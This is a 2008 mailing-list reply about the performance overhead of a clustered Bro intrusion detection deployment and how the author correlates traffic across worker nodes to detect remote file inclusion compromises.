[Discussion] Brainstorming Session Notes
Seth Hall
hall.692 at osu.edu
Tue Nov 18 14:46:41 UTC 2008
On Nov 18, 2008, at 10:28 AM, Matt Jonkman wrote:
> So what kind of overhead do you see on the clustering?
I'm probably not the best person to respond to this question, but I've
never have a feeling that the clustering adds too much overhead. It
forces me to write some of my scripts a little differently if they
need to watch for multiple actions between multiple hosts due to the
fact that I'm splitting the traffic across the worker nodes by src-dst
IP address pairs.
My canonical example of this is detecting hosts successfully
compromised by remote file inclusion vulnerabilities because one of my
workers might see the HTTP request with the attack and another worker
might see the web server go out and request a PHP script or
something. I need to keep a variable for a short time with the attack
HTTP request and synchronize it around to all of the cluster hosts so
that I can compare with any PHP scripts that might be requested by the
attacked host after that.
> Is your setup near the upper or lower end of where the overhead makes
> things feasible?
I've heard from the Bro developers that they've seen near linear
scaling of the cluster deployment up to 24 nodes. My cluster is a
really bad example though because of all of those Dells that are so
slow. The new quad core hosts seem to each be able to handle about
250Mbps in the way I currently have them configured (they're each
running two Bro processes). Once the multicore code in Bro is
functional though, I believe that I'll see significantly better
performance from them. Anyway, the cluster deployment is definitely
feasible and works quite well.
.Seth
---
Seth Hall
Network Security - Office of the CIO
The Ohio State University
Phone: 614-292-9721
More information about the Discussion
mailing list